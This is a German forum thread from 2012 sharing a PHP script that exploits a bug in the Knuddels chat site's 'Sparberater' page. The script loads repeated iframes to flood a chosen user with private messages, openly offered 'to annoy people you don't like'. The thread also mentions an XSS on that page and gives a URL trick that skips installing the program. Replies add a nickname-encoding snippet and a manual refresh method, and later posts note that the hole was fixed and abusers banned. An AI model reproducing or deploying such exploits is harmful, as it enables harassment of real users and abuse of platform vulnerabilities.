Du bist nicht angemeldet.

Localhost

Ehemaliger Supporter

  • »Localhost« ist der Autor dieses Themas

Beiträge: 345

Wohnort: 127.0.0.1

  • Private Nachricht senden

1

17.03.2012, 12:23

Knuddels /m Spam

Hallo,

heute brachte Knuddels 'ne /news bzgl. dem Sparberater raus... Und die haben 'nen fetten Bug mit produziert. Diesen wollen wir uns natürlich nicht nehmen lassen und ihn ausnutzen:

PHP-Quelltext

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
error_reporting(0);

$id str_replace(" ""+"$_GET[id]);
$url 'http://www.knuddels.de/sparberater/sparberater.html?&n='.$id;
$anzahl = (int)$_GET[anzahl];

if(empty($anzahl)) {
    $anzahl 10;
}

if(!empty($id)) {
    echo 'target: '.$id.' => '.$anzahl.'...<br>';
    echo str_repeat("<iframe src="$url" width="100" height="100"></iframe>"$anzahl);
}

?>


Aufrufbar über DATEI.php?anzahl=10&id=Holgi.
110 /m's kann man sich maximal damit machen und Leute, die man nicht mag, nerven. :D
Darüber hinaus ist XSS ebenfalls möglich: www.knuddels.de/sparberater/sparberater.…oobs")</script> , aber das werd ich nicht weiter komentieren.

Viel Spaß damit,
Localhost

EDIT:
Wenn ihr das Programm nicht installieren wollt, weil das eh kein Arsch braucht, folgenden Link aufrufen:
http://www.knuddels.de/sparberater/sparberater_confirm.html?&n=NICK&h=ID1&r=ID2&status=1

NICK, ID1, ID2 entsprechend ersetzen (findet ihr im Quelltext) ;)
No support via message.

"Der gute Programmierer ist nicht der, der keine Fehler macht, sondern der, der seine Fehler rasch findet und behebt."

Dieser Beitrag wurde bereits 5 mal editiert, zuletzt von »Localhost« (17.03.2012, 12:58)


Es haben sich bereits 4 registrierte Benutzer bedankt.

Benutzer, die sich für diesen Beitrag bedankt haben:

Flav, Steelix2011, wishdream, Mentos

2

17.03.2012, 15:01

Geht nicht bei Nicknamen mit Umlauten - nur als Hinweis.
Habe es selber mit einem neuen Nicknamen im Chat getestet der Umlaute enthielt und dann/sparberater gemacht - auch so manuell ging es nicht.

Aber nice Bug :d

3

17.03.2012, 15:43

Einfach die Url http://www.knuddels.de/sparberater/sparberater.html?&n=Nick mit dem gewünschten Nick aufrufen und immer wieder auf refresh klicken
Geht auch :D

4

17.03.2012, 16:14

Wenn man des mit einen Nicknamen machen möchte, was Umlaute besitzt, müssen diese Replaced werden:

PHP-Quelltext

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
            $replace = array(
                "-" => "_cn",
                "ä" => "_oe",
                "ö" => "_pg",
                "ü" => "_pm",
                "ß" => "_np",
                "&" => "_cg",
                "=" => "_dn",
                "@" => "_ea",
                "+" => "_cl",
                "<" => "_dm",
                ">" => "_do"
            );
            
            foreach($replace AS $name => $value) {
                $nickname str_replace($value$name$nickname);
            }

Es hat sich bereits 1 registrierter Benutzer bedankt.

Benutzer, die sich für diesen Beitrag bedankt haben:

CraZE

5

17.03.2012, 21:38

das mit dem php script funkt nicht.

6

17.03.2012, 21:39

Lücke wurde gefixxt.

#Closed.

Localhost

Ehemaliger Supporter

  • »Localhost« ist der Autor dieses Themas

Beiträge: 345

Wohnort: 127.0.0.1

  • Private Nachricht senden

7

18.03.2012, 00:05

# Push

Habe gerade erfahren, dass alle Nicks, die diesen Bug ausgenutzt haben, morgen eine 80-tätige Sperre bekommen.
No support via message.

"Der gute Programmierer ist nicht der, der keine Fehler macht, sondern der, der seine Fehler rasch findet und behebt."

Es hat sich bereits 1 registrierter Benutzer bedankt.

Benutzer, die sich für diesen Beitrag bedankt haben:

Ahmeet